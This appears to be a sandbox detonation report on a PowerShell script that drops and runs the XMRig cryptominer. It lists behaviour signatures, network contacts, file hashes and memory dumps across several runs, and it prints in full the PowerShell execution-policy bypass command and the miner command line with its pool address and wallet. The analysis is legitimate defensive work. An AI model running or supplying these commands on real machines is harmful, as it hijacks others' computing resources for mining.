C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

memory/4964-0-0x00007FFD8E3F3000-0x00007FFD8E3F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3amzkxw1.0hb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4964-9-0x000001ACF9ED0000-0x000001ACF9EF2000-memory.dmp

memory/4964-10-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/4964-11-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/4964-12-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/4964-14-0x000001ACFA760000-0x000001ACFA772000-memory.dmp

memory/4964-15-0x000001ACFA4E0000-0x000001ACFA4EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1136-46-0x000001F1A1C50000-0x000001F1A1C70000-memory.dmp

memory/1136-47-0x000001F1A1CA0000-0x000001F1A1CC0000-memory.dmp

memory/1136-48-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/4964-50-0x00007FFD8E3F3000-0x00007FFD8E3F5000-memory.dmp

memory/1136-49-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/4964-51-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/1136-53-0x000001F1A1CC0000-0x000001F1A1CE0000-memory.dmp

memory/1136-52-0x000001F1A1CE0000-0x000001F1A1D00000-memory.dmp

memory/4964-54-0x00007FFD8E3F0000-0x00007FFD8EEB2000-memory.dmp

memory/1136-55-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-56-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-57-0x000001F1A1CE0000-0x000001F1A1D00000-memory.dmp

memory/1136-58-0x000001F1A1CC0000-0x000001F1A1CE0000-memory.dmp

memory/1136-59-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-60-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-61-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-62-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-63-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-64-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-65-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-66-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-67-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-68-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-69-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-70-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-71-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-72-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-73-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-74-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-75-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-76-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-77-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-78-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-79-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-80-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-81-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-82-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-83-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-84-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-85-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-86-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-87-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-88-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-89-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-90-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-91-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-92-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-93-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-94-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-95-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-96-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-97-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-98-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-99-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-100-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-101-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-102-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-103-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-104-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-105-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-106-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-107-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-108-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-109-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-110-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-111-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-112-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-113-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-114-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-115-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-116-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

memory/1136-117-0x00007FF67D1A0000-0x00007FF67DDD3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:38

Platform

win11-20240426-en

Max time kernel

1795s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/2812-0-0x00007FFF9C8F3000-0x00007FFF9C8F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kajt4zi.jqu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2812-10-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-9-0x0000018A6B5D0000-0x0000018A6B5F2000-memory.dmp

memory/2812-11-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-12-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-13-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-14-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-15-0x00007FFF9C8F0000-0x00007FFF9D3B2000-memory.dmp

memory/2812-17-0x0000018A6B780000-0x0000018A6B792000-memory.dmp

memory/2812-18-0x0000018A6B770000-0x0000018A6B77A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1204-49-0x00000270FEE10000-0x00000270FEE30000-memory.dmp

memory/1204-50-0x00000270FF310000-0x00000270FF330000-memory.dmp

memory/1204-51-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-52-0x00000270FF330000-0x00000270FF350000-memory.dmp

memory/1204-53-0x00000270FF350000-0x00000270FF370000-memory.dmp

memory/1204-54-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-55-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-58-0x00000270FF350000-0x00000270FF370000-memory.dmp

memory/1204-57-0x00000270FF330000-0x00000270FF350000-memory.dmp

memory/1204-56-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-59-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-60-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-61-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-62-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-63-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-64-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-65-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-66-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-67-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-68-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-69-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-70-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-71-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-72-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-73-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-74-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-75-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-76-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-77-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-78-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-79-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-80-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-81-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-82-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-83-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-84-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-85-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-86-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-87-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-88-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-89-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-90-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-91-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-92-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-93-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-94-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-95-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-96-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-97-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-98-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-99-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-100-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-101-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-102-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-103-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-104-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-105-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-106-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-107-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-108-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-109-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-110-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-111-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-112-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-113-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-114-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-115-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-116-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

memory/1204-117-0x00007FF62E420000-0x00007FF62F053000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:44

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 34.197.79.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/1468-3-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-5-0x000001AA39790000-0x000001AA397B2000-memory.dmp

memory/1468-9-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-8-0x000001AA39840000-0x000001AA398B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4fu5irm.yyc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1468-18-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-29-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-30-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-63-0x000001AA39BC0000-0x000001AA39BCA000-memory.dmp

memory/1468-50-0x000001AA39BE0000-0x000001AA39BF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3576-92-0x000001CEEAC40000-0x000001CEEAC60000-memory.dmp

memory/3576-93-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-94-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-95-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-96-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-97-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-98-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-99-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-100-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-101-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-102-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-103-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-104-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-105-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-106-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-107-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-108-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-109-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-110-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-111-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-112-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-113-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-114-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-115-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-116-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-117-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-118-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-119-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-120-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-121-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-122-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-123-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-124-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-125-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-126-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-127-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-128-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-129-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-130-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-131-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-132-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-133-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-134-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-135-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-136-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-137-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-138-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-139-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-140-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-141-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-142-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-143-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-144-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-145-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-146-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-147-0x00007FF647500000-0x00007FF648133000-memory.dmp

